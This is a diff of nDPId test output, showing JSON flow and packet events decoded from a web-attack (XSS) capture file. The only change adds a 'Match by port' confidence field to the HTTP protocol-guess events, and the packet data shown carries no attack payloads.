 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762431,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347762675,"flow_last_seen":1499347762675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347762675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1499347762675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347762675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U3VAAD4GclusEAABwKgKMuz6AFDBm6M8AAAAAKACchAbXAAAAgQFtAQCCAoBO\/BJAAAAAAEDAwc="}
@@ -2700,17 +2700,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1499347771635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347771635,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jzNAAD4GNp2sEAABwKgKMu1aAFBxsHY6AAAAAKACchCPKQAAAgQFtAQCCAoBO\/kJAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6706,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":2,"flow_last_seen":1499347771635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347771635,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7VoJ3i\/mcbB2O6AScSCH4AAAAgQFtAQCCAoD5cp+ATv5CQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6707,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":3,"flow_last_seen":1499347771636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347771636,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jzRAAD4GNqSsEAABwKgKMu1aAFBxsHY7Cd4v54AQAOUm6AAAAQEICgE7+QkD5cp+"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347645232,"flow_last_seen":1499347650797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347646486,"flow_last_seen":1499347651805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347647733,"flow_last_seen":1499347652800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347650289,"flow_last_seen":1499347655800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347651555,"flow_last_seen":1499347656799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347654065,"flow_last_seen":1499347659803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347772648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347774205,"flow_last_seen":1499347774205,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347774205,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60788,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":476,"flow_packet_id":1,"flow_last_seen":1499347774205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347774205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pr5AAD4GHxKsEAABwKgKMu10AFBYS10yAAAAAKACchC++QAAAgQFtAQCCAoBO\/uMAAAAAAEDAwc="}
@@ -2732,17 +2732,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347780605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Kg9AAD4Gm8GsEAABwKgKMu24AFBtBSvDAAAAAKACchDVKgAAAgQFtAQCCAoBPAHMAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6781,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":2,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347780605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7bgVufFFbQUrxKAScSD35AAAAgQFtAQCCAoD5dNAATwBzAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":3,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347780605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KhBAAD4Gm8isEAABwKgKMu24AFBtBSvEFbnxRoAQAOWW7AAAAQEICgE8AcwD5dNA"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
